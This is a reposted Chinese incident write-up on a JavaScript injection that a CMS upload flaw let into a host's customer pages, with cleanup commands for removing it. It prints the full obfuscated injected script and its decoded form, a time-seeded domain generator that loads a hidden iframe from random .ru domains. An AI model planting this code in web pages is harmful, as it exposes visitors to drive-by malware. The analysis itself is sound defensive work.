恶意js脚本注入访问伪随机域名的实例解析
也想出现在这里?
联系我们吧
我们的服务器又出入侵事故了。有客户的html 网页底部被插入了一段js 脚本, 导致访客打开网页时被杀毒软件警告网站上有恶意代码。在黑链SEO 中这是常见的手法, 但奇特的地方就在于我们这次捕获到的代码,会根据当前的时间戳生成一个(伪)随机域名, 然后定时访问。 看上去目的并非是SEO。 一、攻击分析 被插入的javascript 在此——
复制代码
代码如下:
<script lang=\”javascript\”> /*km0ae9gr6m*/ s = \”\”; try { q = document.createElement(\”p\”); q.appendChild(\”123\” + n); } catch (qw) { h = -016 / 7; try { a = prototype; } catch (zxc) { e = window[\”e\” + \”va\” + \”l\”]; n = \”204.351.440.495.232.315.444.550.64.330.404.600.232.246.388.550.200.333.436.390.234.327.392.505.228.120.164.615.26.30.128.160.64.96.472.485.228.96.416.525.64.183.128.580.208.315.460.230.230.303.404.500.64.141.128.580.208.315.460.230.162.177.52.50.64.96.128.160.236.291.456.160.216.333.128.305.64.348.416.525.230.138.460.505.202.300.128.185.64.348.416.525.230.138.324.295.26.30.128.160.64.96.472.485.228.96.464.505.230.348.128.305.64.348.416.525.230.138.260.160.84.96.432.555.64.135.128.580.208.315.460.230.164.96.168.160.208.315.236.65.20.96.128.160.64.315.408.200.232.303.460.580.64.186.128.240.82.369.52.50.64.96.128.160.64.96.128.160.232.312.420.575.92.345.404.505.200.96.244.160.232.303.460.580.118.39.40.160.64.96.128.625.64.303.432.575.202.96.492.65.20.96.128.160.64.96.128.160.64.348.416.525.230.138.460.505.202.300.128.305.64.348.404.575.232.96.172.160.232.312.420.575.92.231.236.65.20.96.128.160.64.375.52.50.64.96.128.160.228.303.464.585.228.330.128.200.232.312.420.575.92.345.404.505.200.96.168.160.232.312.420.575.92.333.440.505.158.354.404.570.154.123.236.65.20.375.52.50.26.30.408.585.220.297.464.525.222.330.128.410.194.330.400.555.218.234.468.545.196.303.456.355.202.330.404.570.194.348.444.570.80.351.440.525.240.123.492.65.20.96.128.160.64.354.388.570.64.300.128.305.64.330.404.595.64.204.388.580.202.120.468.550.210.360.168.245.96.144.192.205.118.39.40.160.64.96.128.590.194.342.128.575.64.183.128.500.92.309.404.580.144.333.468.570.230.120.164.160.124.96.196.250.64.189.128.245.64.174.128.240.118.39.40.160.64.96.128.580.208.315.460.230.230.303.404.500.64.183.128.250.102.156.212.270.110.168.228.240.98.96.172.160.80.300.184.515.202.348.308.555.220.348.416.200.82.96.168.160.96.360.280.350.140.210.280.350.82.96.172.160.80.300.184.515.202.348.272.485.232.303.160.205.64.126.128.240.240.210.280.350.140.123.172.160.80.231.388.580.208.138.456.555.234.330.400.200.230.96.168.160.96.360.280.350.140.123.164.295.26.30.128.160.64.96.464.520.210.345.184.325.64.183.128.260.112.150.220.245.118.39.40.160.64.96.128.580.208.315.460.230.154.96.244.160.100.147.208.275.104.168.204.270.104.165.236.65.20.96.128.160.64.348.416.525.230.138.324.160.122.96.464.520.210.345.184.385.64.141.128.580.208.315.460.230.130.177.52.50.64.96.128.160.232.312.420.575.92.246.128.305.64.348.416.525.230.138.308.160.74.96.464.520.210.345.184.325.118.39.40.160.64.96.128.580.208.315.460.230.222.330.404.395.236.303.456.385.64.183.128.245.92.144.128.235.64.348.416.525.230.138.308.295.26.30.128.160.64.96.464.520.210.345.184.550.202.360.464.160.122.96.440.505.240.348.328.485.220.300.444.545.156.351.436.490.202.342.236.65.20.96.128.160.64.342.404.580.234.342.440.160.232.312.420.575.118.39.40.625.26.30.52.50.204.351.440.495.232.315.444.550.64.297.456.505.194.348.404.410.194.330.400.555.218.234.468.545.196.303.456.200.228.132.128.385.210.330.176.160.154.291.480.205.246.39.40.160.64.96.128.570.202.348.468.570.220.96.308.485.232.312.184.570.222.351.440.500.80.120.308.485.240.135.308.525.220.123.128.210.64.342.184.550.202.360.464.200.82.96.172.160.154.315.440.205.118.39.40.625.26.30.52.50.204.351.440.495.232.315.444.550.64.309.404.550.202.342.388.580.202.240.460.505.234.300.444.410.194.330.400.555.218.249.464.570.210.330.412.200.234.330.420.600.88.96.432.505.220.309.464.520.88.96.488.555.220.303.164.615.26.30.128.160.64.96.472.485.228.96.456.485.220.300.128.305.64.330.404.595.64.246.388.550.200.333.436.390.234.327.392.505.228.213.404.550.202.342.388.580.222.342.160.585.220.315.480.205.118.39.40.160.64.96.128.590.194.342.128.540.202.348.464.505.228.345.128.305.64.273.156.485.78.132.156.490.78.132.156.495.78.132.156.500.78.132.156.505.78.132.156.510.78.132.156.515.78.132.156.520.78.132.156.525.78.132.156.530.78.132.156.535.78.132.156.540.78.132.156.545.78.132.156.550.78.132.156.555.78.132.156.560.78.132.156.565.78.132.156.570.78.132.156.575.78.132.156.580.78.132.156.585.78.132.156.590.78.132.156.595.78.132.156.600.78.132.156.605.78.132.156.610.78.279.236.65.20.96.128.160.64.354.388.570.64.345.464.570.64.183.128.195.78.177.52.50.64.96.128.160.204.333.456.200.236.291.456.160.210.96.244.160.96.177.128.525.64.180.128.540.202.330.412.580.208.177.128.525.64.129.172.160.82.369.52.50.64.96.128.160.64.96.128.160.230.348.456.160.86.183.128.540.202.348.464.505.228.345.364.495.228.303.388.580.202.246.388.550.200.333.436.390.234.327.392.505.228.120.456.485.220.300.176.160.96.132.128.540.202.348.464.505.228.345.184.540.202.330.412.580.208.96.180.160.98.123.372.295.26.30.128.160.64.96.500.65.20.96.128.160.64.342.404.580.234.342.440.160.230.348.456.160.86.96.156.230.78.96.172.160.244.333.440.505.118.39.40.625.26.30.52.50.230.303.464.420.210.327.404.555.234.348.160.510.234.330.396.580.210.333.440.200.82.369.52.50.64.96.128.160.232.342.484.615.26.30.128.160.64.96.128.160.64.96.420.510.80.348.484.560.202.333.408.160.210.306.456.485.218.303.348.485.230.201.456.505.194.348.404.500.64.183.244.160.68.351.440.500.202.306.420.550.202.300.136.205.246.39.40.160.64.96.128.160.64.96.128.160.64.96.128.525.204.342.388.545.202.261.388.575.134.342.404.485.232.303.400.160.122.96.464.570.234.303.236.65.20.96.128.160.64.96.128.160.64.96.128.160.64.354.388.570.64.351.440.525.240.96.244.160.154.291.464.520.92.342.444.585.220.300.160.215.220.303.476.160.136.291.464.505.80.123.188.245.96.144.192.205.118.39.40.160.64.96.128.160.64.96.128.160.64.96.128.590.194.342.128.500.222.327.388.525.220.234.388.545.202.96.244.160.206.303.440.505.228.291.464.505.160.345.404.585.200.333.328.485.220.300.444.545.166.348.456.525.220.309.160.585.220.315.480.220.64.147.216.220.64.117.456.585.78.123.236.65.20.96.128.160.64.96.128.160.64.96.128.160.64.315.408.570.218.96.244.160.200.333.396.585.218.303.440.580.92.297.456.505.194.348.404.345.216.303.436.505.220.348.160.170.146.210.328.325.154.207.136.205.118.96.52.50.64.96.128.160.64.96.128.160.64.96.128.160.210.306.456.545.92.345.404.580.130.348.464.570.210.294.468.580.202.120.136.575.228.297.136.220.64.102.416.580.232.336.232.235.94.102.172.500.222.327.388.525.220.234.388.545.202.129.136.235.228.351.440.510.222.342.404.575.232.342.468.550.126.345.420.500.122.294.444.580.220.303.464.170.82.177.128.65.20.96.128.160.64.96.128.160.64.96.128.160.64.315.408.570.218.138.460.580.242.324.404.230.238.315.400.580.208.96.244.160.68.144.448.600.68.177.128.65.20.96.128.160.64.96.128.160.64.96.128.160.64.315.408.570.218.138.460.580.242.324.404.230.208.303.420.515.208.348.128.305.64.102.192.560.240.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.420.510.228.327.184.575.232.363.432.505.92.354.420.575.210.294.420.540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295\”.split(\”.\”); if (window.document) for (i = 6 – 2 – 1 – 2 – 1; – 1828 + i != 2 – 2; i++) { k = i; s = s + String.fromCharCode(n[k] / (i % (h * h) + 2)); } console.log(s); } } /*qhk6sa6g1c*/ </script>
运维拿到这段代码的时候,都不知道它是要做什么。 在这里不得不吐槽一下,为啥我们的运维都不懂代码……我放到Chrome 里decode 出来, 是这样子的
复制代码
代码如下:
function nextRandomNumber() { var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo – this.R * hi; if (test > 0) { this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix) { var d = new Date(unix * 1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF)); this.A = 48271; this.M = 2147483647; this.Q = this.M / this.A; this.R = this.M % this.A; this.oneOverM = 1.0 / this.M; this.next = nextRandomNumber; return this; } function createRandomNumber(r, Min, Max) { return Math.round((Max – Min) * r.next() + Min); } function generatePseudoRandomString(unix, length, zone) { var rand = new RandomNumberGenerator(unix); var letters = [\’a\’, \’b\’, \’c\’, \’d\’, \’e\’, \’f\’, \’g\’, \’h\’, \’i\’, \’j\’, \’k\’, \’l\’, \’m\’, \’n\’, \’o\’, \’p\’, \’q\’, \’r\’, \’s\’, \’t\’, \’u\’, \’v\’, \’w\’, \’x\’, \’y\’, \’z\’]; var str = \’\’; for (var i = 0; i < length; i++) { str += letters[createRandomNumber(rand, 0, letters.length – 1)]; } return str + \’.\’ + zone; } setTimeout(function () { try { if (typeof iframeWasCreated == \”undefined\”) { iframeWasCreated = true; var unix = Math.round(+new Date() / 1000); var domainName = generatePseudoRandomString(unix, 16, \’ru\’); ifrm = document.createElement(\”IFRAME\”); ifrm.setAttribute(\”src\”, \”http://\” + domainName + \”/runforestrun?sid=cx\”); ifrm.style.width = \”0px\”; ifrm.style.height = \”0px\”; ifrm.style.visibility = \”hidden\”; document.body.appendChild(ifrm); } } catch (e) {} }, 500);
于是大意可知,它内置了一个随机域名生成函数,有趣的事情。 伪随机数发生器基于unix 时间戳,说它是“伪”随机,是因为这并非真正意义上的随机, 我们可以根据时间计算出它所产生的结果。 事实上,它最终每12 个小时就会生成一个类似ctonxidjqijsnzny.ruznycugibimtvplve.ru这样的域名。 这并非有新意的黑客,之前有安全人员对恶意软件下载的分析, 攻击者甚至使用了twitter 消息作为种子来生成域名,这是真正的随机,完全无法预料, 也无从预警和封锁。 话说回来,在这段代码开始运作产生访问流量之前,黑客有充足的时间注册和配置域名, 并挂上木马链接。毫无疑问的是,如果2012 真的不是世界末日, 我们很容易预知到它即将产生什么域名。于是写段程序检测一下, 直至未来的2012 年8 月7 日,有89 个域名已经注册,WHOIS 显示DNS 解析服务器在俄国。 真正的黑客大国,老毛子名不虚传。 网上搜了一下,很多国外服务商也遇到了这个问题,有人甚至观测到一些服务器端的逻辑, 比如根据访问者IP 进行302 重定向的机制。 二、安全漏洞 更重要的问题是,恶意js 代码是怎么注入到我们客户的网页上的呢? 通过查看日志我们发现,捅篓子的是某著名后台管理系统的一个文件上传漏洞, 目前厂商已经给出修复方案。他们建议重置所有用户的密码…… 三、擦屁股 这苦逼活,又是我的差事。花了一个小时,写了两句话,测试通过。 # check grep -rl –include=*.{php,js,htm,html} "km0ae9gr6m" /var/www/vhosts/* > injeted_list.txt # clean up grep -rl –include=*.{php,js,htm,html} "km0ae9gr6m" /var/www/vhosts/* | xargs sed -i -e \’s/\\/\\*km0ae9gr6m/\\n&/g\’ -e \’s/qhk6sa6g1c\\ //&\\n/g\’ -e \’/km0ae9gr6m*/,/qhk6sa6g1c/d\’ 参考链接: http://research.zscaler.com/2012/07/mass-compromise-includes-computerworld.html 作者 lovelucy
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 恶意js脚本注入访问伪随机域名的实例解析
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 恶意js脚本注入访问伪随机域名的实例解析
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
